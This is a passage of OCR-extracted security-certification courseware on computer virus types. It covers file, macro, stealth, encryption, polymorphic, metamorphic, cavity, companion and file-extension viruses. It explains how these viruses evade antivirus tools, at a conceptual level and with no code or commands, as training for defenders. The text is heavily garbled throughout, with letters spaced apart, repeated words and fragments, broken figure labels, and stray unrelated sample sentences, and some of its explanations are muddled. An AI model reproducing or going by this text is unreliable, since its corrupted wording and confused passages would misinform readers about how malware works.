Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
F ile and M ultipartite ultipa rtite V iruses iru ses
CEH
F i le l e a n d M u l t ip ip a r t it e V i r u s e s F ile Viruses Viruses File viruses infect files that are executed or interpreted in the system such as COM, EXE, SYS, OVL, OVL, OBJ OBJ,, PRG, PRG, MN U, and BAT files. File viruses can be eit he r dir ec t-a ct ion (no n-re sid en t) or memory-resident. Overwriting viruses cause irreversible damage to the files. These viruses m a i n l y t a r g e t a ra r a n g e o f o p e r a t i n g s y s t e m s t h a t i n c l u d e W i n d o w s , U N I X, X, D OS OS, a nd nd M a c i n t o s h .
C harac terizing File File Viruses Viruses File
viruses
are
mainly
characterized
and
described
based
on
their
physical
behavior
or
c h a r a c t e r i s t i c s . T o c l a s s if if y a f i l e v i r u s i s b y t h e t y p e o f f i l e t a r g e t e d b y i t , s uc uc h a s EX EXE o r C O M f i le le s , t h e b o o t s e c t o r , e t c . A f i l e v i ru ru s c a n al al s o be be c h a r a c t e r i z e d b a s e d o n h o w i t i n f e c t s t h e targeted file (also known as the host files): Q
P r e p e n d i n g : w r i t e s i t s e l f i n t o t h e b e g i n n i n g o f t h e h o s t f i l e 's 's c o d e
Q A p p e n d i n g : w r i t e s i t s e l f t o t h e e n d o f t h e h o s t fi fi l e ©
Overwriting: overwrites the host file's code with its own code
Q
Inserting: inserts itself into gaps inside the host file's code
Module
07
Page Page 1040
Ethical Hacking and Coun termea sures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
©
C o m p a n i o n : r e n a m e s t h e o r i g in in a l f i le le a n d w r i t e s i t s e l f w i t h t h e h o s t f ilil e 's 's n a m e
©
le s e c t i o n s o f 3 2 - b i t fi fi l e C a v i t y i n f e c t o r : w r i t e s i t s e l f b e t w e e n f i le
F ilil e v i r u se s e s a re re a ls l s o cl cl a ss s s i fi fi e d b a se se d o n w h e t h e r t h e y a r e n o n - m e m o r y r e s i d e n t o r m e m o r y resident. Non-memory resident viruses search for EXE files on a hard drive and then infect them, whereas memory resident viruses stays actively in memory, and trap one or more system functions. File viruses are said to be polymorphic, encrypted, or non-encrypted. A polymorphic or encrypted virus contains one or more decryptors and a main code. Main virus code is d e c r y p t e d b y t h e d e c r y p t o r b e f o r e i t s t a rt rt s . A n e n c r y p t e d v i r u s u s u a l l y us us es es v a r ia ia b l e o r f i x e d key decryptors, whereas polymorphic viruses have decryptors that are randomly generated f r o m i n s t r u c t i o n s o f p r o c e s s o r s an a n d t h a t c o n s i st s t o f a l o t o f c o m m a n d s t h a t a r e n o t u s ed ed i n t h e d e c r y p t i o n p ro r o c es es s . Execution of Payload:
Q
©
Direct action: Imm ediate ly upon execution
©
T i m e b o m b : A f t e r a s p e c i f ie ie d p e r io io d o f t i m e
©
Condition triggered: Only unde r certain cond itions
M ultipa ultipa rtite rtite Viruses A m u l t i p a r t i t e v i r us u s i s a ls ls o k n o w n as a m u l t i - p a r t v i ru ru s t h a t a t t e m p t s t o a t t a c k b o t h
t h e b o o t s e c t o r a n d t h e e x e c u t a b l e o r p r o g r a m f i l e s a t t h e s a m e t i m e . W h e n r g w v i ru ru s i s attached to the boot sector, it will in turn affect the system files, and then the virus attaches to t h e f i le le s , a nd nd t h i s t i m e i t w i llll i n t u r n i n f e c t t h e b o o t s e c t o r .
FIGURE 7.7: File and Multipartite Viruses
Module 07 Page 1041
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
CEH
M a cr o V ir u s e s
Urt1fw4 ilhiul lUtbM
0
0 11. 11. Infects Macro Enabled Documents
0
Attacker
User
0 r
0
0 0 Macro viruses infect templates or convert infected documents into template files, files, while maintainingtheir appearance of ordinary documentfiles
0 Most macro macro viruses are written using using macro language Visual Basic for Applications (VBA)
r
V
0
0
0
0
Copyright © by EC-CaIllic it Al 1Rights 1Rights Reserved. Reproduction is Strictly Prohibited.
M a c r o V i ru ru s e s M i c r o s o f t W o r d o r s i m ili l a r a p pl p l i ca c a t i o n s ca c a n b e in in f e c t e d t h r o u g h a c o m p u t e r v i r u s c a llll e d m a c r o v i ru r u s , w h i c h a u t o m a t i c a l l y p e r f o r m s a s e q u e n c e o f a c t io io n s w h e n t h e a p p l i c a t i o n i s triggered or something else. Most macro viruses are written using the macro language Visual Ba ass ic ic f o r A p p l i c a t i o n s ( V B A ) a nd nd t h e y i n f e c t t e m p l a t e s o r c o n v e r t i n f e c t e d d o c u m e n t s i n t o t e m p l a t e f i le le s , w h i l e m a i n t a i n in i n g t h e i r a p p e a r an a n c e o f o r d i n a r y d o c u m e n t f ili l e ess . M a c r o v i r u s e s a r e s o m e w h a t l es es s h a r m f u l t h a n o t h e r t y p e s . T h e y a re r e u s u a l l y s p r e a d v ia ia a n e m a i l . P u re re d a t a f i le le s d o n o t a l l o w t h e s p r e a d o f v i r us us e s , b u t s o m e t i m e s t h e l in in e b e t w e e n a d a t a f ilil e a n d a n executable file is easily overlooked by the average user due to the extensive macro languages in some programs. In most cases, just to make things easy for users, the line betwe en a data file a n d a p r o g r a m s t a r t s t o b l u r o n l y i n c as as es es w h e r e t h e d e f a u l t m a c r o s a r e s e t t o r u n a u t o m a t i c a l l y e v e r y t i m e t h e d a t a f ilil e is is l o a d e d . V i r u s w r i t e r s c an an e x p l o i t c o m m o n p r o g r a m s w i t h m a c r o capability such as Microsoft Word, Excel, and other Office programs. Windows Help files can also contain macrocode. In addition, the latest exploited macrocode exists in the full version of t h e A c r o b a t p r o g r a m t h a t r e a d s a nd nd w r i t e s P DF DF f ilil e s. s.
Module 07 Page 1042
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Infects Macro Enabled Documents
Attacker
User FIGURE 7.8: Macro Viruses
Module 07 Page 1043
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
C EH
C lu s t e r V ir u s e s Cluster Viruses J
a
Cluster Cluster viruses viruses modify directory table entries so so that it points users or system processes to the virus code instead of the actual program
: I :*]
Virus Copy J
There There is only one one copy of the virus virus on on the the disk disk infe infectin cting g all the programs in the compu ter system
Launch Itself J
It will will launch launch itself first when when any progr program am on the computer system is started and then the control is passed to actual program
Copyright © by EC-Cauactl.All Rights Reserved. Reproduction Reproduction is Strictly Prohibited
C l u s t e r V ir u s e s C l u s t e r v i r us us e s i n f e c t f i le l e s w i t h o u t c h a n g i n g t h e f i l e o r p l a n t i n g e x t r a f i l es es t h e y c h a n g e t h e D OS OS d i r e c t o r y i n f o r m a t i o n s o t h a t e n t r i e s p o i n t t o t h e v i r u s c o d e i n s t e ad ad o f t h e a c t u a l program. When a program runs DOS, it first loads and executes the virus code, and then the v i r u s l o c a t e s t h e a c t u a l p r o g r a m a n d e x e c u t e s i t. t. D i r - 2 i s a n e x a m p l e o f t h i s t y p e o f v i ru ru s . Cluster viruses modify directory table entries so that directory entries point to the virus code. T h e r e i s o n l y o n e c o p y o f t h e v i r u s o n t h e d i s k i n f e c t i n g a llll t h e p r o g r a m s i n t h e c o m p u t e r system. It will launch itself first when any program on the com pu ter system is started and then t h e c o n t r o l is p a ssss e d t o t h e a c t u a l p r o g r a m .
Module 07 Page 1044
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
S t e a lt h / T u n n e lin g V ir u s e s
CEH
These viruses evade the anti-virus software by intercepting its requests to the operating system A virus can hide itself by intercepting the anti-virus software's request to read the file and passingthe request to the virus, instead of the OS The virus can then return an un infec ted version of the file to the antiantivirus software, so that it appears as if the file is "clean"
Hides Infected TCPIP.SYS
i f
Here you go
Original TCPIP.SYS Copyright © by EC-Cauactl.All Rights Reserved. Reproduction is Strictly Prohibited.
S t e a l th / T u n n e l in g V ir u se s I
Stealth V iruse s T h e s e v i ru ru s e s t r y t o h i d e t h e m s e l v e s f r o m a n t i v i r u s p r o g r a m s b y a c t i v e ly l y a l t e r i n g an an d
corrupting the chosen service call interrupts when they are being run. Requests to perform operations in respect to these service call interrupts are replaced by virus code. These viruses state false information to hide their presence from antivirus programs. For example, the stealth virus hides the operations that it modified and gives false representations. Thus, it takes over p o r t i o n s o f t h e t a r g e t s y s t e m a n d h i d e s i ts ts v i ru ru s c o d e . T h e s t e a l t h v i r u s h i d es e s i t s e l f f r o m a n t i v i r u s s o f t w a r e b y h i d i n g t h e o r i g i n a l s iz iz e o f t h e f i l e o r t e m p o r a r i l y p l a c i n g a c o p y o f i t s e l f i n s o m e o t h e r d r i v e o f t h e s y s t e m , t h u s r e p l a c in in g t h e i n f e c t e d f i l e w i t h t h e u n i n f e c t e d f i l e t h a t i s s t o r e d o n t h e h a r d d r iv iv e . A s t e a l th th v i r u s h i de de s t h e m o d i f i c a t i o n s t h a t i t m a k e s . I t t a k e s c o n t r o l o f t h e s y s t e m ' s f u n c t i o n s that read files or system sectors and, when another program requests information that has a l re r e a d y b e e n m o d i f ie i e d b y t h e v i ru r u s , th t h e s t e a l t h v i r u s r e p o r t s t h a t i n f o r m a t i o n t o t h e r e q u e s t in in g p r o g r a m i n s t e a d. d. T h is is v i ru ru s a l s o r e si s i d es es i n t h e m e m o r y . To avoid detection, these viruses always take over system functions and use them to hide their presence.
Module 07 Page 1045
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
O n e o f t h e c a r r ie ie r s o f t h e s t e a l t h v i r u s i s t h e r o o t k i t . I n s t a lll l i ng n g a r o o t k i t g e n e r a l l y r e s u lt l t s i n th th i s virus attack because rootkits are installed via Trojans, and thus are capable of hiding any malware. Removal: Q
A l w a y s d o a c o l d b o o t ( b o o t f r o m w r i t e - p r o t e c t e d f l o p p y d is is k o r C D) D)
©
N e v e r us us e D OS OS c o m m a n d s s u c h a s F DI DI SK SK t o f i x t h e v i r u s
e
U se se a n t i v i r u s s o f t w a r e
/
Tun neling neling Viruses These viruses trace the steps of interceptor programs that monitor operating system
r e q u e s t s s o t h a t t h e y g e t i n t o B IO IO S a n d D OS OS t o i n s t a llll t h e m s e l v e s . T o p e r f o r m t h i s a c t iv iv i t y , t h e y e v en e n t u n n e l u n d e r a n t i v i r u s s o f t w a r e p r o g ra ra m s . Give me the system file file
tcpip.syi to icon
Anti-virus Software
Hides Infected TCPIP.SYS
*
VIRUS
Here you go Original TCPIP.SYS FIGURE 7.9: Working of Stealth/Tunneling Stealth/Tunneling Viruses Viruses
Module 07 Page 1046
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
CEH
E n c r y p tio n V ir u s e s This type of virus uses simple encryption to encipher encipher the the code code
Virus Code
V r
The virus is encrypted with a different different key for each each infected file
V.
AV scanner cannot directly detect these types of viruses using signature detection methods
Encryption Virus 2
Encryption Virus 3
-/
Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
E n c r y p t io i o n V i ru ru s e s T h is i s t y p e o f v ir ir u s c o ns n s i s ts ts o f a n e n c r y p t e d c o p y o f t h e v i r u s a n d a d e c r y p t i o n m o d u l e . The decrypting module remains constant, whereas the different keys are used for encryption. T h e s e v i ru ru s e s g e n e r a l l y e m p l o y X O R o n e a c h b y t e w i t h a r a n d o m i z e d k e y. y. ©
T h e v i r u s is is e n c i p h e r e d w i t h a n e n c r y p t i o n k e y t h a t c o n s i st st s o f a d e c r y p t i o n m o d u l e a n d an encrypted c opy of the code.
Q
For each infected file, the virus is encrypted by using a different combination of keys, but the decrypting m odule part remains unchanged. It is not possible for the virus scanner to directly detect the virus by means of s i g n a tu t u r e s , b u t t h e d e c r y p t i n g m o d u l e c an an b e d e t e c t e d .
e
T h e d e c r y p t i o n t e c h n i q u e e m p l o y e d i s x o r e ac ac h b y t e w i t h a r a n d o m i z e d k e y t h a t is is g e n e r a t e d a n d s a ve ve d b y t h e r o o t v i ru ru s .
Module 07 Page 1047
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Virus Code
Encryption
Encryption
Encryption
Virus 1
Virus 2
Virus B
FIGURE 7.10: 7.10: Working of Encryption Viruses
Module 07 Page 1048
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
Exam Exam 312-50 Certified Ethical Hacker
CEH
P o ly m o r p h ic C o d e J
Polym orphic cod e is a code that muta tes whil e keeping the original algorithm intact
J
To enable po lymor phic code, the virus has to have a po lymor phic engine (also called mutating engine or mutation engine
J
A well-written polym orphic virus theref ore has no pa rts tha t stay th e sam e on each infection
39Encrypted Mutation Engine
Encrypted Virus Code
Decryptor Routine
............ Decryptor routine decrypts virus code and mutation engine engine
New Polymorphic Virus User Runs an Infected Program
RAM RAM Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
Polym orphic Code Polymorphic viruses modify their code for each replication in order to avoid detection. They accomplish this by changing the encryption module and the instruction sequence. A r a n d o m n u m b e r g e n e r a to t o r is is u se se d fo fo r i m p l e m e n t i n g p o l y m o r p h i s m . A mutation engine is generally used to enable polymorphic code. The mutator provides a sequence of instructions that a virus scanner can use to optimize an appropriate detection algorithm. Slow polymorphic codes are used to prevent antivirus professionals from accessing t h e c o d e s. s. Virus samples, which are bait files after a single execution is infected, contain a similar copy of t h e v i r u s . A s i m p l e i n t e g r i t y c h e c k e r i s us us e d t o d e t e c t t h e p r e s e n c e o f a p o l y m o r p h i c v i r u s i n th th e system's disk.
Module 07 Page 1049
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Encrypted Mutation Engine (EME)
ncrypted ncrypted M utation Encry Engine
j
i I
A
©
Encrypted Virus Code
I
Decryptor Routine
A
Instruct to0 •
i
• Instruct to
Decryptor routine decrypts virus code and mutation engine
New Polymorphic Polymorphic
*
©
Virus Does the Damage
User Runs an Infected Program
Virus
RA M
FIGURE 7.11: How Polymorphic Code Work
P o l y m o r p h i c v i ru ru s e s c o ns n s i st st o f t h r e e c o m p o n e n t s . T h e y a r e t h e e n c r y p t e d v i r u s c o d e , t h e d e c r y p t o r r o u t i n e , a n d t h e m u t a t i o n e n g in i n e . T he he f u n c t i o n o f th th e d e c r y p t o r r o u t i n e i s t o d e c r y p t t h e v i r u s c od o d e . I t d e c ry r y p t s t h e c o d e o n l y a f t e r ta ta k i n g c o n t r o l o v e r t h e c o m p u t e r . T h e m u t a t i o n e n g i n e g e n e r a t e s r a n d o m i z e d d e c r y p t i o n r o u t i n e s . Th T h is is d e c r y p t i o n r o u t i n e s v a ri r i e s e v e ry ry t i m e w h e n a n e w p r o g r a m is i n f e c t e d b y t h e v i ru ru s . With a polymorphic virus, both the mutation engine and the virus code are encrypted. When a p r o g r a m t h a t i s i n f e c t e d w i t h a p o l y m o r p h i c v ir ir u s is is r u n b y t h e u s e err , t h e d e c r y p t o r r o u t i n e t a k e s c o m p l e t e c o n t r o l o v e r t h e s y s t e m , a f t e r w h i c h i t d e c ry ry p t s t h e v i ru ru s c o d e a n d t h e m u t a t i o n e n g i n e. e. N e x t , t h e c o n t r o l o f y o u r s y s t e m i s t r a n s f e r r e d b y t h e d e c r y p t i o n r o u t i n e t o t h e v i r u s , which locates a new program to infect. In RAM (Random Access Memory), the virus makes a replica of itself as well as the mutation engine. Then the virus instructs the encrypted mutation engine
to
generate
a
new
randomized
decryption
routine,
which
has
the
capability
of
decrypting virus. Here, this new copy of both the virus code and mutation engine is encrypted by the virus. Thus, this virus, along with the newly encrypted virus code and encrypted m u t a t i o n e n g i n e ( EM E M E ), ), a p p e n d s t h is is n e w d e c r y p t i o n r o u t i n e o n t o a n e w p r o g r a m , t h e r e b y c o n t i n u i n g t h e p r oc oc e s s. s. P o l y m o r p h i c v i ru r u s e s t h a t r e s p r e ad a d b y t h e a t t a c k e r i n t a r g e t e d s y s t e m s a r e d i f f ic ic u l t t o d e t e c t because here the virus body is encrypted and the decryption routines changes each time from i n f e c t i o n t o i n f e c t i o n a n d n o t w o i n f e c t i o n s l o o k t h e s a m e ; t h is is m a k e i t d i f f i c u l t f o r t h e v i r u s s c a n n e r t o i d e n t i f y t h i s v i r u s. s.
Module 07 Page 1050
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
M e ta m o r p h ic V ir u s e s M e t a m o rp h i c Vir u s e s
M e t a m o rp h i c C Co ode
Metamorphic viruses rewrite themselves completely each time they are to infect new executable
Metamorphic Metamorphic code can reprogram itself by translating transl ating its own code into a temporary representation and then back to the normal code again
MotaphoR VI by tHE moNTAL Dill lei/2 9*
CEH
UrtM UrtMM M itkNjI itkNjI lUilwt
For example, example, W32/Simile W32/Si mile consisted of over 14000 14000 lines of assembly code, 90% of it is part of the metamorphic engine
E3
MetaphoRVI bj •HEmtfJTA EmtfJTALD
E l a.) Variant ariant A
c.) The"Unoffi fficial” cial” Variant C at IAHMJ1 IL bYiHfc ni Ntnl cttllller/^JA cttllller/^JA
mEtAPHGR1bBYtH• GR1bBYtH•
A1LER/2*\
r£TAfSC« iCbVlHEn£ iCbVlHE n£W»4l dFIIUi/ dFIIUi/2^ 2^
E l
[1E
b.) V ar ia nt B
I
d.) The .D variant (which was the *official' C of the original author)
Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
M e ta m o r p h i c V iru s es Some viruses rewrite themselves to infect newly executed files. Such viruses are c o m p l e x a n d u se se m e t a m o r p h i c e n g in in e s f o r e x e c u t io io n . A code that can reprogram itself is called metamorphic code. This code is translated into the temporary code, and then converted back to the normal code. This technique, in which the o r i g in in a l a l g o r i t h m r e m a i n s i n t a c t , is is u s e ed d t o a v o id id p a t t e r n r e c o g n i t i o n o f a n t i v i r u s s o f t w a r e . T h is is is is m o r e e f f e c t i v e i n c o m p a r i s o n t o p o l y m o r p h i c c o d e . T h is is t y p e o f v i r u s c o n s is is t s o f c o m p l e x extensive code. T h e c o m m o n l y k n o w n m e t a m o r p h i c v ir i r u se s e s a re re : W i n 3 2 / S im i m i l e: e:
This virus is written in assembly language and destined for Microsoft Windows. This process is c o m p l e x , a n d n e a r l y 9 0 % o f v i ru r u s c o d e s a r e g e n e r a t e d b y t h is is p r o c es es s . Zmist:
Zmist is also known as the Zombie. Mistfall is the first virus to use the technique called "code integration." This code inserts itself into other code, regenerates the code, and rebuilds the executable.
Module 07 Page 1051
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
Exam Exam 312-50 Certified Ethical Hacker
a.) Variant A
c.) The "Unofficial" Variant C
ImElAPHOR 1b BY tHe MeNTAI drilLER/29A
12
i!LER/ mEtAPHOR 1b BY tHe MeNTAI di!LER/ ro in
b.) Variant B
aA
m
mETAPhOr 1C 1C bY tHE mENtal dRllle1/29A dRllle1/29A
Q
mETAPhOr 1C bY (HE mENtal dRlller/29A
..... o k
...
d.) The .D variant (which was the "official" C of the original author) FIGURE 7.12: Metamorphic Viruses Screenshot
Mo dule 07 Page Page 1052
Ethical Hacking and Coun termea sures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
File Overwriting Overw riting or or Cavity Viruses Viru ses
CEH
Cavity Virus overwrites a part of the host file with a constant (usually nulls), without increasingthe length of the file and preserving its functionality
Sales and marketing management management is the leading authority authori ty for execu executives tives in the sales sales and marketing management management industries industries The suspect, Desmo Desmond nd Turner, surrendered surrendered to to authorities authoriti es at a downtown Indianapolis Indianapolis fast-food restaurant
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
NUll
Nu l l
Nu l l
Nu l l
Nu l l
Nu l l
Original File Size: 45 KB
> 23a
Nu l l
Infected File Size: 45 KB
Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
F i le l e O v e r w r i ti t i n g o r C a v i t y V i ru ru s e s These are also known as space-fillers since they maintain a constant file-size while infected by installing themselves into the target program. They append themselves to the end o f f ilil e s a n d a l so s o c o r r u p t t h e s t a r t o f f i le l e s . Th Th i s t r i g g e r e v e n t f i r s t a c t i v a t e s a n d e x e c u t e s t h e v i r us us code, and later the original application p rogram. S o m e p r o g r a m f i le le s h a v e a r e as a s o f e m p t y s p a c e . T h is is e m p t y s p ac ac e i s t h e m a i n t a r g e t o f t h e s e viruses. The Cavity Virus, also known as the Space Filler Virus, stores its code in this empty space. The virus installs itself in this unoccupied space without any destruction to the original code. It installs itself in the file it attempts to infect. T h is is t y p e o f v i r u s is is ra ra r e l y u s e d b e c a u s e i t is is d i f f i c u l t t o w r i t e . A n e w W i n d o w s f i le le c a l l ed ed t h e Portable Executable it designed for the fast loading of programs. However, it leaves a certain gap in the file while it is being executed that can be used by the Space Filler Virus to insert itself. The most popular virus family is the CIH virus.
Original File Size: 45 KB
I
h
............ ............................................ .....................^
PDF
L
>PDF1
Infected File Size: 45 KB
FIGURE 7.13: File Overwriting or Cavity Virus
Module 07 Page 1053
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
S p a r s e I n f ec to r V ir u s e s M
ir S p a r s e I n f e c t o r Vi Vi r u s J
Sparse infector virus infects on ly occasiona lly (e.g. every tenth program executed), or only files whose lengths fall within a narrow range
D i f fi fi c u l t t o D e t e c t J
By infecting less often, such viruses try to minimize the probability of being being discovered discovered
Infection Process
Wake up on 15* of every month and execute code
Copyright © by EC-Cauactl.All Rights Reserved. Reproduction is Strictly Prohibited.
S p a r s e I n f e c t o r V i ru ru s e s S p ar ar s e i n f e c t o r v i r u s es e s i n f e c t o n l y o c c a s i o n a l ly l y ( e. e . g. g. , e v e r y t e n t h p r o g r a m e x e c u t e d o r o n p a r t i c u l a r d a y o f t h e w e e k ) o r o n l y f ilil e s w h o s e l e n g t h s f a llll w i t h i n a n a r r o w
range. By
infecting less often, these viruses try to minimize the probability of being discovered.
Wake up on 15th of every month and execute code
FIGURE 7.14: 7.14: Working of Sparse Infector Viruses
Module 07 Page 1054
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Comp Co mpan anio ion/ n/Ca Camo mouf ufla lag ge Virus ruses I
C EH
A Companion virus creates a companion file for each executable executable file the virus infec i nfects ts
A
Therefore, a companion virus may save itself itsel f as as notepad.com notepad.com and every time ti me a user executes notepad.exe (good program), program), the computer comput er will load notepad.com (virus) and infect the system
Virus infects the system with a file notepa d.com and saves it in c:\winnt\system32directory
...
1 Attacker
1
/
£
Notepad.exe
Notepad.com
Copyright © by EC-Cauactl.All Rights Reserved. Reproduction is Strictly Prohibited.
C o m p a n i o n /C a m o u f la g e V iru se s Com panion Viruses 4
T h e c o m p a n i o n v i ru ru s s to t o r e s it it s e lf l f b y ha h a v in i n g t h e i d e n ti ti c a l f i le le n a m e a s t h e t a r g e t e d
p r o g r a m f i l e . A s s o o n a s t h a t f i le l e is e x e c u t e d , t h e v i r u s i n f e c t s t h e c o m p u t e r , a n d h a r d d i s k d a t a is modified. Companion viruses use DOS that run COM files before the EXE files are executed. The virus installs an identical COM file and infects the EXE files. Source: h t t p : / / w w w . c k n o w . c o m / v t u t o r / C o m p a n i o n V i r u s e s . h t m l Here is what happens: Suppose a companion virus is executing on your PC and decides it is time to infect a file. It looks around and happens to find a file called PGM.EXE. It now creates a file c a llll e d P G M . C O M , c o n t a i n i n g t h e v i r u s . T h e vi vi r u s u s u a l l y p l a n ts t s t h i s f i le le i n t h e s a m e d i r e c t o r y a s t h e . EX EXE f i l e , b u t i t c o u l d p l a c e i t i n a n y d i r e c t o r y o n y o u r D OS OS p a t h . I f y o u t y p e P G M a n d p r e ssss Enter, DOS executes PGM.COM instead of PGM.EXE. (In order, DOS will execute COM, then EXE, a n d t h e n B AT AT f i l e s o f t h e s a m e r o o t n a m e , i f t h e y a r e a llll i n t h e s a m e d i r e c t o r y . ) T h e v i r u s executes, possibly infecting more files, and then loads and executes PGM.EXE. The user p r o b a b l y w o u l d f a i l t o n o t i c e a n y t h i n g i s w r o n g . I t is i s e a ssyy t o d e t e c t a c o m p a n i o n v i r u s j u s t b y the presence of the extra COM file in the system.
Module 07 Page 1055
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
Exam Exam 312-50 Certified Ethical Hacker
Virus infects the system with a file notepad.com and saves It In c:\wlnnt\system32 directory
Attacker
V Notepad.exe
Notepad.com
FIGURE 7.15: 7.15: Working of Companion/Camouflage Companion/Camouflage Viruses
Module 07 Page 1056
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
c EH
S h e ll V ir u s e s J
(citif ifwd IthMJl lUckM
Virus code forms forms a shell around the target host program's program's code, code, making making itself the original program and host code a s its sub-routine
J
[4U«1
Almost all boot program viruses are shell viruses
Before Infection
Original Program
A f t e r I n f e ct ct i o n
Virus Virus Cod e --- >
Original Program
Copyright © by EC-Cauactl.All Rights Reserved. Reproduction is Strictly Prohibited.
I l f
S h e ll ll V i r u s e s A s he he l l v i r u s c o d e f o r m s a l a y er e r a r o u n d t h e t a r g e t h o s t p r o g r a m ' s c o d e t h a t c a n be be
c o m p a r e d t o a n " e g g s h e l l / ' m a k i n g i t s e l f t h e o r i g i n a l p r o g r a m a n d t h e h o s t c o d e i ts ts s u b routin e. Here e,, t h e o r i g i n a l c o d e i s m o v e d t o a n e w l o c a t i o n b y t h e v i r u s c o d e a n d t h e v i r u s assumes its identity. Before Infection
Original Program
A f t e r In f e c t i o n
Virus Code
Original Program
FIGURE FIGURE 7.16: W ork ing o f Shell Shell Viruses
Module 07 Page 1057
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
CEH
F i l e E x t e n s io io n V i r u s e s
Folder Options ptions
File Extensio n Viruses General
J File ile extension viruses viruses change the the extensions extensions of file fil es
Search
Folder views You can apply the view (such as Detais or Icons) that you are us*1g for this folder to a l folders of this type Apply to Folders
J .TXT is safe as it indicates indicates a pure text file
Advanced settings: settings:
J With it h extensions extensions turned off, if someone eone sends you you a fi file named BAD.TXT.VBS, you will only only see BAD.TXT
Fies and Folders □ Always Always show icons, icons, never thum thumbna bnails ils I I Always show menus @ Display Me icon on thumbnails 0 Display ay He size nfoimation m folder tps □ Displa Displayy the full path in the the title bar bar Jl Hdde n Mes and folders Don show hidden files, folders, or dnves (§) Show hidden files, es, folders, and dnves y Hide cmgty dnves in the Computer folder
J If you have forgott forgotten en that that extens extensions ions are turned turned off, you might think think this is is a text fil file e and ope open n it
O
J This is an executabl execut able e Visual isual Basic Basic Script cript virus virus file file and could do serious damage
V. Ude folder merge merge conflicts conflicts Restore QfifoJls
J Counterme ountermeasure asure is is to turn off of f "Hide "Hide file extensions" in Windows
*PP*y
Copyright © by EC-Cauactl.All Rights Reserved. Reproduction is Strictly Prohibited.
F i le le E x t e n s i o n V i r u s e s
u
Source: h t t p :/ : / / w w w . c k n o w . c o m / v tu t u t o r /F / F i le l e E x t e n s i o n s . h tm tm l ©
F ilil e e x t e n s i o n v i r u s e s c h a n g e t h e e x t e n s i o n s o f f i le le s
Q
.TXT is safe as as it indicate s a pure te xt file
Q
